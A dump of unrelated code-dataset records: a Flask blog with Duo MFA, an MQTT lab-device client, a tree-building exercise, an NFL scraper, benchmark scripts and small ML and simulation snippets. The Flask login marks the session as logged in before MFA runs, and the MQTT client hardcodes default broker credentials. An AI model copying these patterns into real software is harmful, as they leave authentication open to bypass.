config.get('duo', 'akey')\n ikey = config.get('duo', 'ikey')\n skey = config.get('duo', 'skey')\n host = config.get('duo', 'host')\n return {'akey': akey, 'ikey': ikey, 'skey': skey, 'host': host}\n\n\n# make a database connection\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n# Request DB connections helpers\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n@app.teardown_request\ndef teardown_request(exception):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n\n\n# Routing functions\n@app.route('/')\ndef show_entries():\n cur = g.db.execute('select title, text from entries order by id desc')\n entries = [dict(title=row[0], text=row[1]) for row in cur.fetchall()]\n return render_template('show_entries.html', entries=entries)\n\n\n@app.route('/add', methods=['POST'])\ndef add_entry():\n if not session.get('logged_in'):\n abort(401)\n g.db.execute('insert into entries (title, text) values (?, ?)', [request.form['title'], request.form['text']])\n g.db.commit()\n flash('New entry was successfully posted')\n return redirect(url_for('show_entries'))\n\n\n@app.route('/mfa', methods=['GET', 'POST'])\ndef mfa():\n result = grab_keys()\n sec = duo.sign_request(result['ikey'], result['skey'], result['akey'], \"admin\")\n if request.method == 'GET':\n return render_template('duoframe.html', duohost=result['host'], sig_request=sec)\n if request.method == 'POST':\n user = duo.verify_response(result['ikey'], result['skey'], result['akey'], request.args.get('sig_response'))\n if user:\n return render_template(url_for('mfa'), user=user)\n\n\n@app.route('/success', methods=['POST'])\ndef success():\n return \"Success!\"\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != app.config['USERNAME']:\n error = 'Invalid Username'\n elif request.form['password'] != app.config['PASSWORD']:\n error = 'Invalid password'\n else:\n session['logged_in'] = True\n flash('You were logged in')\n return redirect(url_for('mfa'))\n return render_template('login.html', error=error)\n\n\n@app.route('/logout')\ndef logout():\n session.pop('logged_in', None)\n flash('You were logged out')\n return redirect(url_for('show_entries'))\n\n\n# main body\nif __name__ == '__main__':\n 
app.run()\n","sub_path":"flaskr.py","file_name":"flaskr.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"298920848","text":"import time\nimport paho.mqtt.client as paho\nimport datetime\nimport queue\nimport threading\nimport secrets\nimport sys\nimport os\nimport ast\nimport configparser\nimport tkinter\n\n# Adding the ../MAQLab/.. folder to the system path of python\n# It is temporarily used by this script only\nscript_dir = str()\ntry:\n script_dir = os.path.dirname(__file__)\n maqlab_dir = \"\\\\maqlab\"\n script_dir = script_dir[0:script_dir.index(maqlab_dir)] + maqlab_dir\n if script_dir not in sys.path:\n sys.path.insert(0, script_dir)\nexcept:\n pass\n\n# default broker credentials\nmqtt_hostname = \"mqtt.techfit.at\"\nmqtt_port = 1883\nmqtt_user = \"maqlab\"\nmqtt_pass = \"maqlab\"\nmqtt_tls = False\n\nconfig_file = os.path.dirname(os.path.abspath(__file__)) + \"/maqlab.conf\"\nconfig = configparser.ConfigParser()\n\ntry:\n config.read(config_file)\n if not config.has_section(\"MQTT\"):\n raise Exception\n mqtt_hostname = config.get(\"MQTT\", \"hostname\")\n mqtt_port = config.get(\"MQTT\", \"port\")\n mqtt_user = config.get(\"MQTT\", \"user\")\n mqtt_pass = config.get(\"MQTT\", \"pass\")\n mqtt_tls = config.get(\"MQTT\", \"tls\")\nexcept:\n print(str(\n datetime.datetime.now()) + \" :MAQLAB - Could not open file \" + config_file + \" or data in file is corrupted\")\n exit(0)\n # raise\n\nprint(str(datetime.datetime.now()) + \" :MAQLAB - Configuration loaded successfully\")\n\n\nclass MqttMsg:\n def __init__(self, topic, payload=\"\"):\n self.topic = topic\n self.payload = payload\n\n\nclass MAQLabError(Exception):\n pass\n\n\nclass MAQLab(Exception):\n pass\n\n\n# --------------------------------------------------------------------------------\n# Class M A Q L A B\n# --------------------------------------------------------------------------------\nclass MAQLab:\n\n def __init__(self, host, port, user, password, session_id, stamp=\"\"):\n try:\n self.__q_out = queue.Queue()\n print(str(datetime.datetime.now()) + \" :\" + \"MQTT - started\")\n self.__static_stamp = stamp\n self.__mqtt_hostname = str(host)\n self.__mqtt_port = int(port)\n self.__mqtt_user = str(user)\n self.__mqtt_pass = str(password)\n self.__session_id = session_id\n self.__device_commands = list()\n self.__device_types = list()\n self.__device_models = list()\n self.__device_manufactorers = list()\n self.__device_accessnumbers = list()\n self.__lock = threading.Lock()\n self.__client = paho.Client()\n self.__client.on_connect = self.__on_connect\n self.__client.on_disconnect = self.__on_disconnect\n self.__client.on_message = self.__on_message\n self.__client.reconnect_delay_set(min_delay=1, max_delay=5)\n self.__client.username_pw_set(self.__mqtt_user, self.__mqtt_pass)\n self.__client.connect(self.__mqtt_hostname, self.__mqtt_port)\n self.__client.loop_start()\n attemptions = 1\n while not self.__client.is_connected():\n print(str(datetime.datetime.now()) + \" :MQTT - connecting...attempt#\" + str(attemptions))\n time.sleep(1)\n attemptions += 1\n\n print(str(datetime.datetime.now()) + \" :\" + \"MQTT - ready\")\n except Exception as _e:\n # print(_e)\n print(\n str(datetime.datetime.now()) + \" :\" + \"MAQlab - Connection Error! 
Are you connected to the internet?\")\n raise _e\n\n # --------------------------------------------------------\n # MQTT Broker callback on_connect\n # --------------------------------------------------------\n def __on_connect(self, _client, userdata, flags, rc):\n if rc == 0:\n print(str(datetime.datetime.now()) + \" :\" + \"MQTT - connected.\")\n self.__client.subscribe(\"maqlab/\" + str(self.__session_id) + \"/rep/#\", qos=0)\n self.__client.subscribe(\"maqlab/\" + str(self.__session_id) + \"/+/rep/#\", qos=0)\n print(str(datetime.datetime.now()) + \" :\" + \"MQTT - Subscriptions done.\")\n\n # ------------------------------------------------------------------------------\n # MQTT Broker callback on_disconnect\n # ------------------------------------------------------------------------------\n def __on_disconnect(self, _client, userdata, rc):\n if rc != 0:\n print(str(datetime.datetime.now()) + \" :\" + \"Unexpected MQTT-Broker disconnection.\")\n\n # ------------------------------------------------------------------------------\n # MQTT Broker callback on_message\n # ------------------------------------------------------------------------------\n def __on_message(self, _client, _userdata, _msg):\n # check topic\n try:\n topic = _msg.topic.decode(\"utf-8\")\n except:\n try:\n topic = _msg.topic.replace(\" \", \" \")\n except:\n return\n # check payload\n try:\n payload = _msg.payload.decode(\"utf-8\")\n except:\n try:\n payload = _msg.payload.replace(\" \", \" \")\n except:\n return\n\n # print(_msg.topic, _msg.payload)\n # on_message is called from an other thread and therefore\n # the object _msg could be manipulated immediately\n # after putting it on the queue before it is handled\n # from the following stage.\n # The solution is to send topic and payload as string rather than as object\n self.__q_out.put(str([topic, payload]), block=False, timeout=0)\n\n # ------------------------------------------------------------------------------\n # Flush the queue\n # ------------------------------------------------------------------------------\n def __flush(self, block=False, timeout=0):\n while True:\n try:\n if self.__q_out.empty():\n return\n else:\n self.__q_out.get(block=block, timeout=timeout)\n except:\n return\n\n # ------------------------------------------------------------------------------\n # Send ( internal used )\n # ------------------------------------------------------------------------------\n def __send(self, msg, stamp=\"_\"):\n try:\n self.__flush()\n self.__client.publish(\"maqlab/\" + self.__session_id + \"/\" + stamp + \"/cmd\" + msg.topic, msg.payload)\n except:\n raise MAQLabError(\"Send error\")\n\n # ------------------------------------------------------------------------------\n # Receive ( internal used )\n # ------------------------------------------------------------------------------\n def __receive(self, block=True, timeout=1.0, stamp=\"_\"):\n try:\n rec_msg = self.__q_out.get(block=block, timeout=timeout)\n try:\n rec_msg = rec_msg.decode(\"utf-8\")\n except:\n pass\n # eval to list object\n rec_msg = ast.literal_eval(rec_msg)\n try:\n msg = MqttMsg(topic=rec_msg[0], payload=rec_msg[1])\n if stamp in msg.topic.split(\"/\"):\n return msg\n else:\n raise MAQLabError(\"Wrong message stamp - message discarded \")\n except:\n raise\n except:\n if block:\n raise MAQLabError(\"Timeout error\")\n else:\n raise MAQLab(\"Empty\")\n\n # ------------------------------------------------------------------------------\n # Send a message and wait for the answer\n # 
------------------------------------------------------------------------------\n def send_and_receive(self, receive=True, accessnumber=None, command=\"\", value=\"\", msg=None, block=True,\n timeout=1.0):\n try:\n value = str(value)\n except:\n value = \"\"\n\n if msg is None:\n if not command.startswith(\"/\"):\n command = \"/\" + command\n if accessnumber is not None:\n command = \"/\" + str(accessnumber) + command\n msg = MqttMsg(command, value)\n else:\n if not msg.topic.startswith(\"/\"):\n msg.topic = \"/\" + msg.topic\n if accessnumber is not None:\n msg.topic = \"/\" + str(accessnumber) + msg.topic\n\n with self.__lock:\n try:\n self.__flush()\n if not receive:\n self.__send(msg=msg)\n else:\n stamp = self.__static_stamp\n if stamp == \"\":\n stamp = str(int((time.time() * 1000) % 1000000))\n self.__send(msg=msg, stamp=stamp)\n if receive:\n return self.__receive(block=block, timeout=timeout, stamp=stamp)\n except Exception as _e:\n raise _e\n\n # ------------------------------------------------------------------------------\n # Send a message and returns a list of all answers\n # ------------------------------------------------------------------------------\n def send_and_receive_burst(self, accessnumber=None, command=\"\", value=\"\", msg=None, block=True, timeout=1.0,\n burst_timout=1.0):\n try:\n value = str(value)\n except:\n value = \"\"\n\n if msg is None:\n if not command.startswith(\"/\"):\n command = \"/\" + command\n if accessnumber is not None:\n command = \"/\" + str(accessnumber) + command\n msg = MqttMsg(command, value)\n else:\n if not msg.topic.startswith(\"/\"):\n msg.topic = \"/\" + msg.topic\n if accessnumber is not None:\n msg.topic = \"/\" + str(accessnumber) + msg.topic\n\n _timeout = timeout\n msg_list = list()\n with self.__lock:\n try:\n stamp = self.__static_stamp\n if stamp == \"\":\n stamp = str(int((time.time() * 1000) % 1000000))\n self.__flush()\n self.__send(msg=msg, stamp=stamp)\n while True:\n try:\n msg_received = self.__q_out.get(block=block, timeout=_timeout)\n try:\n msg_received = msg_received.decode(\"utf-8\")\n except:\n pass\n msg_received = ast.literal_eval(msg_received)\n msg = MqttMsg(topic=msg_received[0], payload=msg_received[1])\n if stamp in msg.topic:\n _timeout = burst_timout\n msg_list.append(msg)\n except:\n if len(msg_list) == 0:\n raise MAQLabError(\"Empty data\")\n return msg_list\n except Exception as _e:\n raise _e\n\n # ------------------------------------------------------------------------------\n #\n # ------------------------------------------------------------------------------\n def load_devices(self):\n try:\n detected_devices_raw = self.send_and_receive_burst(command=\"/?\", burst_timout=0.5)\n try:\n detected_devices = []\n for item in detected_devices_raw:\n try:\n if \"accessnumber\" in item.topic:\n topic_splitted = item.topic.split(\"/\")\n devicename = topic_splitted[topic_splitted.index(\"rep\") + 1]\n accessnumber = int(item.payload)\n detected_devices.append(tuple((devicename, accessnumber)))\n except:\n raise\n except:\n raise\n # we have the list of device\n # next task is to request the details of the device\n # reading the available commands and manufactor from each device\n # lets clear the actual list\n self.__device_commands.clear()\n self.__device_types.clear()\n self.__device_models.clear()\n self.__device_manufactorers.clear()\n\n for device in detected_devices:\n print(str(datetime.datetime.now()) + \" :\" + \"MAQlab - Detected: \" + str(\n device[0]) + \" Accessnumber is \" + str(device[1]))\n 
try:\n number = int(device[1])\n except:\n raise\n self.__device_accessnumbers.append(number)\n # query the device through this instance rather than the module-level maqlab global\n reps = self.send_and_receive_burst(command=str(device[1]) + \"/?\", burst_timout=0.5)\n for rep in reps:\n if \"commands\" in rep.topic:\n self.__device_commands.append(rep.payload)\n elif \"manufactorer\" in rep.topic:\n self.__device_manufactorers.append(rep.payload)\n elif \"model\" in rep.topic:\n self.__device_models.append(rep.payload)\n elif \"devicetype\" in rep.topic:\n self.__device_types.append(rep.payload)\n\n # print(self.__device_models)\n # print(self.__device_accessnumbers)\n # print(self.__device_manufactorers)\n # print(self.__device_commands)\n # print(self.__device_types)\n\n except:\n raise\n return detected_devices\n\n # ------------------------------------------------------------------------------\n #\n # ------------------------------------------------------------------------------\n def close(self):\n try:\n self.__client.on_disconnect = None\n self.__client.on_connect = None\n self.__client.disconnect()\n except:\n pass\n\n def __get_model(self):\n return self.__device_models\n\n def __get_accessnumbers(self):\n return self.__device_accessnumbers\n\n def __get_commands(self):\n return self.__device_commands\n\n def __get_manufactorers(self):\n return self.__device_manufactorers\n\n def __get_types(self):\n return self.__device_types\n\n def __isconnected(self):\n return self.__client.is_connected()\n\n # ------------------------------------------------------------------------------\n #\n # ------------------------------------------------------------------------------\n def __str__(self):\n return self.__session_id\n\n device_models = property(__get_model)\n device_accessnumbers = property(__get_accessnumbers)\n device_types = property(__get_types)\n device_manufactorers = property(__get_manufactorers)\n device_commands = property(__get_commands)\n is_connected = property(__isconnected)\n\n\ntry:\n maqlab = MAQLab(host=mqtt_hostname,\n port=mqtt_port,\n user=mqtt_user,\n password=mqtt_pass,\n session_id=secrets.token_urlsafe(3).lower())\n maqlab.load_devices()\n # window = tkinter.Tk()\n # window.title = \"MAQLAB device Monitor\"\n\nexcept Exception as e:\n maqlab = None\n","sub_path":"MAQLab/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":15379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"646461285","text":"# Given inorder and postorder traversal of a tree, construct the binary tree.\n\n# Note:\n# You may assume that duplicates do not exist in the tree.\n\nimport Tree\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n\tdef buildSubTree(self, inorder, postorder, inIndex, postIndex, length):\n\t\t# if len(preorder) == 0:\n\t\t# \treturn None\n\t\t# else:\n\t\tnode = Tree.TreeNode(postorder[postIndex + length - 1])\n\t\tleftLen = inorder.index(node.val) - inIndex\n\t\trightLen = length - leftLen - 1\n\t\tif leftLen == 0:\n\t\t\tleftNode = None\n\t\telse:\n\t\t\tleftInIndex = inIndex\n\t\t\tleftPostIndex = postIndex\n\t\t\tleftNode = self.buildSubTree(inorder, postorder, leftInIndex, leftPostIndex, leftLen)\n\t\tif rightLen == 0:\n\t\t\trightNode = None\n\t\telse:\n\t\t\trightInIndex = inIndex + 1 + leftLen\n\t\t\trightPostIndex = postIndex + leftLen\n\t\t\trightNode = self.buildSubTree(inorder, postorder, rightInIndex, rightPostIndex, rightLen)\n\t\tnode.left 
= leftNode\n\t\tnode.right = rightNode\n\t\treturn node\n\t\t\n\tdef buildTree(self, inorder, postorder):\n\t\t\"\"\"\n\t\t:type inorder: List[int]\n\t\t:type postorder: List[int]\n\t\t:rtype: TreeNode\n\t\t\"\"\"\n\t\t\n\t\tif len(inorder) == 0:\n\t\t\treturn None\n\n\t\treturn self.buildSubTree(inorder, postorder, 0, 0, len(inorder))\n\n# 1\n# / \\\n# 2 3\n# / \\ / \\\n# 4 5 6 7 \n\nso = Solution()\ninorder = [4,2,5,1,6,3,7]\npostorder = [4,5,2,6,7,3,1]\nTree.disp(so.buildTree(inorder, postorder))","sub_path":"python/106_Construct_Binary_Tree_from_Inorder_and_Postorder_Traversal.py","file_name":"106_Construct_Binary_Tree_from_Inorder_and_Postorder_Traversal.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"260653073","text":"from bs4 import BeautifulSoup\nimport pandas as pd\nimport numpy as np\nimport requests\nfrom random import randint\nfrom selenium import webdriver\nfrom time import sleep\n\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\ndriver = webdriver.Chrome('chromedriver', chrome_options=chrome_options)\n\nteams = ['htx', 'kan', 'nyj', 'buf', 'sea', 'atl', 'phi', 'was', 'cle', 'rav', 'mia', 'nwe', 'gnb', 'min', 'clt', 'jax', 'chi', 'det', 'rai', 'car', 'sdg', 'cin', 'crd', 'sfo', 'tam', 'nor', 'dal', 'ram', 'pit', 'nyg', 'oti', 'den']\n\nno_table = []\nurl = 'https://www.pro-football-reference.com'\nyear = 2021\n\nfor team in teams:\n week = 101\n driver.get(url + '/teams/' + str(team) + '/2021.htm') \n sleep(randint(2,10))\n table = pd.read_html(driver.page_source)\n cols = ['Week', 'Day', 'Date', 'Time', 'Home',\t'Opp_Name', 'Final']\n dft = table[0]\n dft.columns = cols\n dft.dropna(subset=['Opp_Name'], inplace=True)\n dft['Week'] = dft.Week.str.replace(\"Pre \", \"10\", regex=True)\n dft = dft[~dft.Opp_Name.str.contains(\"Preseason\", na=False)]\n dft = dft[~dft.Opp_Name.str.contains(\"Regular Season\", na=False)]\n # dft = dft[dft.Week == week]\n dft[['Result','Score']] = dft.Final.str.split(\",\",expand=True)\n dft[['Tm','Opp']] = dft.Score.str.split(\"-\",expand=True)\n dft['Result'] = [0 if r=='L' else 1 for r in dft['Result']]\n dft['Home'] = [0 if r=='@' else 1 for r in dft['Home']]\n dft = dft.drop(['Day', 'Time', 'Final', 'Score'], axis=1)\n dft['Result'] = dft['Result'].fillna(0)\n dft['Tm'] = dft['Tm'].fillna(0)\n dft['Opp'] = dft['Opp'].fillna(0)\n dft['Team'] = str(team)\n dft = dft.set_index('Team')\n dft.reset_index(inplace=True)\n no_table.append(dft)\n\n\ndriver.close() \ndf = pd.concat(no_table)\n\ndf['Opp_Name'] = df['Opp_Name'].astype('category')\ndf['Team'] = df['Team'].astype('category')\ndf['Week'] = df['Week'].astype('int')\ndf['Home'] = df['Home'].astype('int')\ndf['Result'] = df['Result'].astype('int')\ndf['Tm'] = df['Tm'].astype('int')\ndf['Opp'] = df['Opp'].astype('int')\ndf.to_csv('2021df_pretest.csv')","sub_path":"NFL2021-PreWeeks_parser.py","file_name":"NFL2021-PreWeeks_parser.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"601356195","text":"def open_file_write():\n '''This function will write a bash file which auto run the testing of the project to get the running data'''\n with open('script.sh', 'w') as file:\n file.write('#! 
/bin/bash\\n')\n # compile files by three commands below\n file.write('mpicc omp_mpi_main.c tools.c binary.c mpi_binary.c mpi_enum.c mpi_merge.c mpi_quick.c merge.c quick.c enum.c start_algorithm.c omp_merge.c omp_enum.c omp_quick.c -o omp_mpi_main\\n')\n file.write('mpicc main.c tools.c binary.c mpi_binary.c mpi_enum.c mpi_merge.c mpi_quick.c merge.c quick.c enum.c start_algorithm.c -o main\\n')\n file.write(\n 'gcc project_file.c binary.c enum.c merge.c quick.c start_algorithm.c tools.c -o project_file\\n')\n # edit here to change how many times you want to test\n\n for q in range(1, 4):\n # edit here to change the array size range you want to test\n for k in [5000, 20000, 50000]:\n # edit here to change the process num you want to test\n for i in range(1, 9):\n # edit here to change the thread num you want to test\n for j in range(1, 9):\n file.write(\n 'mpirun -np {} omp_mpi_main {} all {}\\n'.format(i, k, j)) # mpi&omp for all\n file.write(\n 'printf \"current seed: {}, process: {}, thread: {}, turn: {}\\\\n\"\\n'.format(k, i, j, q))\n file.write(\n 'mpirun -np {} main {} all -mpi\\n'.format(i, k)) # mpi for all\n file.write('./project_file {} all\\n'.format(k)) # serial\n\n # edit here to change the array size range you want to test\n for k in [500000, 3000000, 8000000, 15000000, 30000000]:\n # edit here to change the process num you want to test\n for i in range(1, 9):\n # edit here to change the thread num you want to test\n for j in range(1, 9):\n file.write(\n 'mpirun -np {} omp_mpi_main {} quick {}\\n'.format(i, k, j)) # mpi&omp for quick\n file.write(\n 'mpirun -np {} omp_mpi_main {} merge {}\\n'.format(i, k, j)) # mpi&omp for merge\n file.write(\n 'printf \"current seed: {}, process: {}, thread: {}, turn: {}\\\\n\"\\n'.format(k, i, j, q))\n file.write(\n 'mpirun -np {} main {} quick -mpi\\n'.format(i, k)) # mpi for quick\n file.write(\n 'mpirun -np {} main {} merge -mpi\\n'.format(i, k)) # mpi for merge\n file.write('./project_file {} quick\\n'.format(k)) # serial\n file.write('./project_file {} merge\\n'.format(k)) # serial\n\n\nif __name__ == '__main__':\n open_file_write()\n","sub_path":"submit/auto_get_result.py","file_name":"auto_get_result.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"386100374","text":"\"\"\"\nQ1. Why is the report method untestable ? [2 pts]\nAns:- The report method has external dependencies.\n It depends on the \"open function\" and the Txt file.\n\n\n\nQ2. How will you change the API of the report method to make it more testable ? 
[2 pts]\nAns:- The API of the report method can be changed by the number of arguments it accepts, as\n \"report(self, numbers, opener)\"\nwhere \"opener\" will be used for creating an impression of writing the report to a file.\n\n\"\"\"\nclass FizzBuzz(object):\n def report(self, numbers,opener):\n\n report_file = opener('c:/temp/fizzbuzz_report.txt', 'w')\n\n for number in numbers:\n msg = str(number) + \" \"\n fizzbuzz_found = False\n if number % 3 == 0:\n msg += \"fizz \"\n fizzbuzz_found = True\n if number % 5 == 0:\n msg += \"buzz \"\n fizzbuzz_found = True\n\n if fizzbuzz_found:\n report_file.write(msg + \"\\n\")\n\n report_file.close()\n\nif \"__main__\" == __name__:\n fb = FizzBuzz()\n fb.report(range(100), open) # pass the real built-in open; tests can inject a fake opener\n\n \n","sub_path":"FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"188101039","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef populate_tutor_in_group(apps, schema_editor):\n Tutor = apps.get_model('tutor', 'Tutor')\n TutorInTutorGroup = apps.get_model('tutor', 'TutorInTutorGroup')\n for tu in Tutor.objects.all():\n for tg in tu.groups.all():\n TutorInTutorGroup(tutor=tu, tutorgroup=tg).save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('tutor', '0008_tutorintutorgroup'),\n ]\n\n operations = [\n migrations.RunPython(populate_tutor_in_group),\n ]\n","sub_path":"mftutor/tutor/migrations/0009_auto_20150708_1300.py","file_name":"0009_auto_20150708_1300.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"16725055","text":"FILE_PATH = r\"yob1994.txt\"\nRESULTS_FILE_PATH = r\"results.txt\"\n\nSEARCH_MODE = \\\n[\\\n\"Exact Match\",\\\n\"Start with\",\\\n\"Ends with\",\\\n\"Contains\"\\\n]\n\ndef find(msg_list, letters, mode):\n\tresult = []\n\tfor msg in msg_list:\n\t\tif (mode == 1 and msg[0] == letters) or \\\n\t\t\t(mode == 2 and msg[0].lower().startswith(letters.lower())) or \\\n\t\t\t(mode == 3 and msg[0].lower().endswith(letters.lower())) or \\\n\t\t\t(mode == 4 and letters.lower() in msg[0].lower()):\n\t\t\tresult.append(msg)\n\treturn result\n\ndef get_find_mode():\n\tprint (\"\\nHow do you want to search:\")\n\ti = 1\n\tfor line in SEARCH_MODE:\n\t\tprint (\"%d\\t%s\" % (i, line))\n\t\ti += 1\n\tmode = 0\n\twhile True:\n\t\tmode = input(\"Select: \")\n\t\tif mode and mode.isdigit():\n\t\t\tmode = int(mode)\n\t\telse:\n\t\t\tprint (\"Please enter a number between 1 and %d\" % len(SEARCH_MODE))\n\t\t\tcontinue\n\n\t\tif mode >= 1 and mode <= len(SEARCH_MODE):\n\t\t\tbreak\n\t\telse:\n\t\t\tprint (\"Please enter a number between 1 and %d\" % len(SEARCH_MODE))\n\n\treturn mode\n\ndef get_msg(file_path):\n\tf = open(file_path) \n\tmsg_list = []\n\tfor line in f:\n\t\tmsg_list.append(line.strip().split(','))\n\tf.close()\n\treturn msg_list\n\ndef get_items_max_length(msg_list):\n\titems_len = []\n\tfor items in msg_list:\n\t\tfor i in range(len(items)):\n\t\t\tif i >= len(items_len):\n\t\t\t\titems_len.append(len(items[i]))\n\t\t\telse:\n\t\t\t\tif items_len[i] < len(items[i]):\n\t\t\t\t\titems_len[i] = len(items[i])\n\treturn items_len\n\ndef get_print_items(items_len, items):\n\tformat_str = \"\"\n\tfor i in range(len(items)):\n\t\tformat_str += \"%\"\n\t\tif i != 2:\n\t\t\tformat_str += \"-\"\n\t\tformat_str += str(items_len[i]) + \"s 
\"\n\treturn format_str % tuple(items)\n\nif __name__ == \"__main__\":\n\tmsg_list = get_msg(FILE_PATH)\n\tf = open(RESULTS_FILE_PATH, \"w\")\n\twhile True:\n\t\tmode = get_find_mode();\n\t\tletters = input(\"Look for: \")\n\t\tif not letters:\n\t\t\tbreak\n\t\tret = find(msg_list, letters, mode)\n\t\tif mode > 1:\n\t\t\tf.write(\"\\nLook for \\\"%s\\\" by \\\"%s\\\":\\n\" % (letters, SEARCH_MODE[mode-1]))\n\t\tif ret:\n\t\t\titems_len = get_items_max_length(ret)\n\t\t\tfor data in ret:\n\t\t\t\tif mode > 1:\n\t\t\t\t\tf.write(','.join(data) + \"\\n\")\n\t\t\t\t#print '\\t'.join(data)\n\t\t\t\tprint (get_print_items(items_len, data))\n\t\telse:\n\t\t\tprint (\"%s not found\" % letters)\n\t\t\tif mode > 1:\n\t\t\t\tf.write(\"%s not found\\n\" % letters)\n\t\tif mode > 1:\n\t\t\tf.flush()\n\tf.close()","sub_path":"python/20150304/4g/4g.py","file_name":"4g.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"372806086","text":"import numpy as np\n\ndef tanh(x):\n return np.tanh(x)\n\ndef d_tanh(x):\n return 1 - tanh(x) ** 2\n\nnp.random.seed(1234)\nx = np.array([\n [1,1,1,1],\n [1,1,0,1],\n [0,0,1,1],\n [1,1,0,0],\n [0,0,0,0],\n [1,1,1,0]\n])\n\ny = x.sum(axis=1)\n\nwx = np.random.randn()\nwrec = np.random.randn()\nwx_learning = 0.5\nwrec_learning = 0.002\n\nstates = np.zeros((x.shape[0],x.shape[1]+1))\ngrad_overtime = np.zeros(x.shape)\n\n\nprint(\"Data :\",x.shape)\nprint(\"states :\",states.shape)\nnumber_epoch = 30000\n\nfor iter in range(number_epoch):\n \n state_1 = states[:,0] * wrec + x[:,0] * wx\n state_1 = tanh(state_1)\n states[:,1] = state_1\n\n state_2 = states[:,1] * wrec + x[:,1] * wx\n state_2 = tanh(state_2)\n states[:,2] = state_2\n\n state_3 = states[:,2] * wrec + x[:,2] * wx\n state_3 = tanh(state_3)\n states[:,3] = state_3\n\n state = states[:,3] * wrec + x[:,3] * wx\n # state = tanh(state)\n states[:,4] = state\n\n cost = np.square(states[:,4] - y).sum() / len(x)\n \n if iter % 1000 == 0 :\n print(\"Current Iter: \", iter, \" current error: \",cost)\n\n grad_overtime[:,3] = (states[:,4] - np.squeeze(y)) * (2/len(x))\n grad_overtime[:,2] = grad_overtime[:,3] * wrec \n grad_overtime[:,1] = grad_overtime[:,2] * wrec\n grad_overtime[:,0] = grad_overtime[:,1] * wrec\n\n grad_wx = np.sum(grad_overtime[:,3] * x[:,3] + \n grad_overtime[:,2] * x[:,2] * d_tanh(state_3)+ \n grad_overtime[:,1] * x[:,1] * d_tanh(state_2)+ \n grad_overtime[:,0] * x[:,0] * d_tanh(state_1))\n\n grad_rec = np.sum(grad_overtime[:,3] * states[:,3] + \n grad_overtime[:,2] * states[:,2] * d_tanh(state_3) + \n grad_overtime[:,1] * states[:,1] * d_tanh(state_2) + \n grad_overtime[:,0] * states[:,0] * d_tanh(state_1))\n \n wx = wx - wx_learning * grad_wx\n wrec = wrec - wrec_learning * grad_rec\n\n\n\n\nstate = states[:,0] * wrec + x[:,0] * wx\nstate = tanh(state)\nstates[:,1] = state\n\nstate = states[:,1] * wrec + x[:,1] * wx\nstate = tanh(state)\nstates[:,2] = state\n\nstate = states[:,2] * wrec + x[:,2] * wx\nstate = tanh(state)\nstates[:,3] = state\n\nstate = states[:,3] * wrec + x[:,3] * wx\n# state = tanh(state)\nstates[:,4] = state\n\n\nprint(y)\n\nprint(states[:,4])\nprint(np.round(states[:,4]))\n\n\n# -- end code --","sub_path":"1_numpy/c_After_final_restart_dec_15/h_rnn_with_tanh.py","file_name":"h_rnn_with_tanh.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"415022614","text":"from 
metadrive.engine.core.manual_controller import KeyboardController, SteeringWheelController\nfrom metadrive.examples import expert\nfrom metadrive.policy.env_input_policy import EnvInputPolicy\nfrom metadrive.engine.engine_utils import get_global_config\n\n\nclass ManualControlPolicy(EnvInputPolicy):\n \"\"\"\n Control the current track vehicle\n \"\"\"\n def __init__(self, obj, seed):\n super(ManualControlPolicy, self).__init__(obj, seed)\n config = self.engine.global_config\n self.engine.accept(\"t\", self.toggle_takeover)\n if config[\"manual_control\"] and config[\"use_render\"]:\n if config[\"controller\"] == \"keyboard\":\n self.controller = KeyboardController()\n elif config[\"controller\"] == \"joystick\":\n try:\n self.controller = SteeringWheelController()\n except:\n print(\"Load Joystick Error! Fall back to keyboard control\")\n self.controller = KeyboardController()\n else:\n raise ValueError(\"No such a controller type: {}\".format(self.config[\"controller\"]))\n\n def act(self, agent_id):\n try:\n if self.engine.current_track_vehicle.expert_takeover:\n return expert(self.engine.current_track_vehicle)\n except ValueError:\n # if observation doesn't match, fall back to manual control\n pass\n if self.engine.global_config[\"manual_control\"] and self.engine.agent_manager.get_agent(\n agent_id) is self.engine.current_track_vehicle and not self.engine.main_camera.is_bird_view_camera():\n return self.controller.process_input(self.engine.current_track_vehicle)\n else:\n return super(ManualControlPolicy, self).act(agent_id)\n\n def toggle_takeover(self):\n if self.engine.current_track_vehicle is not None:\n self.engine.current_track_vehicle.expert_takeover = not 